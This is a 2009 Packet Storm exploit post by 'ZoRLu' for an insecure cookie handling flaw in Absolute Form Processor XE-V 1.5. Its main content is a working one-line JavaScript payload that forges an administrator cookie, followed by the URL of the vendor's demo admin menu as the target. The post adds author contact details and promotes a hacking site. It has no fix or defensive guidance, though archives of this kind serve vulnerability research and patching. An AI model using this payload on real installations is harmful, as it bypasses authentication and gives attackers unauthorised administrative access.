Absolute Form Processor XE-V 1.5 Insecure Cookie

2009-04-24T00:00:00
ID PACKETSTORM:76999
Type packetstorm
Reporter ZoRLu
Modified 2009-04-24T00:00:00

Description

                                        
                                            `[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 11.04.2009  
[~]  
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com  
[~]  
[~] msn: trt-turk@hotmail.com  
[~]   
[~] N0T: Herkes Hecker Olmus :S  
[~]  
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com  
[~] -----------------------------------------------------------  
  
exploit:   
  
javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";  
  
after you go here:  
  
http://www.xigla.com/absolutefp/demo/menu.asp  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone  
[~]  
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org / dafgamers.com  
[~]  
[~]----------------------------------------------------------------------  
  
  
`